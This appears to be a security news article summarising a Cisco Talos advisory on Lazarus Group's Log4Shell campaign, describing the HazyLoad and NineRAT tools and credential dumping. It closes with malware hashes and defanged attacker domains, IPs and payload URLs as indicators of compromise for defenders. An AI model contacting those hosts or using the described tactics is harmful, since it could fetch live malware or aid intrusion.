Lazarus Group, the threat actor, has been detected engaging in a fresh wave of attacks named “Operation Blacksmith,” focusing on exploiting the Log4Shell vulnerability (CVE-2021-44228).
Lazarus Group Targets Log4Shell
As of today, a recent advisory released by security researchers at Cisco Talos reveals that the attacks exploited the Log4Shell vulnerability in VMWare Horizon servers exposed to the public, gaining initial access.
The advisory states, “This campaign involves persistent opportunistic targeting of global enterprises that openly host and expose susceptible infrastructure to n-day vulnerability exploitation, such as CVE-2021-44228.”
The advisory further notes, “Lazarus has been observed focusing on companies within the manufacturing, agricultural, and physical security sectors.”
After successfully exploiting the system, Lazarus carried out thorough reconnaissance by executing various commands to collect system information, query event logs, and perform OS credential dumping.
The attackers utilized a specially crafted implant called HazyLoad, serving as a proxy tool to establish direct access to the compromised system.
Remarkably, Lazarus departed from its previous tactics by generating a local user account with administrative privileges, deviating from the use of unauthorized domain-level accounts.
In a noteworthy development, the threat actors altered their tactics during the hands-on-keyboard phase by downloading and employing credential dumping utilities, which included ProcDump and MimiKatz.
During the second phase of the operation, the deployment of a previously unknown Remote Access Trojan (RAT) named “NineRAT” was uncovered. Of significance is the RAT’s use of a Telegram-based Command and Control (C2) channel to receive initial commands for fingerprinting infected systems.
Moreover, the research identified a shift in Lazarus’ tactics, as NineRAT is coded in DLang, signaling a departure from conventional frameworks.
The company also highlighted, “NineRAT possesses the capability to uninstall itself from the system using a BAT file.”
According to Cisco Talos, the information gathered by Lazarus through NineRAT might be shared with distinct Advanced Persistent Threat (APT) groups, stored in a separate repository distinct from the initial access and implant deployment data.
IOCs
HazyLoad
000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee
NineRAT
534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433
ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4
47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30
f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59
5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541
82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def
BottomLoader
0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f
DLRAT
e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f
9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a
Network IOCs
tech[.]micrsofts[.]com
tech[.]micrsofts[.]tech
27[.]102[.]113[.]93
185[.]29[.]8[.]53
155[.]94[.]208[.]209
162[.]19[.]71[.]175
201[.]77[.]179[.]66
hxxp://27[.]102[.]113[.]93/inet[.]txt
hxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif
hxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php
hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif
hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Get Social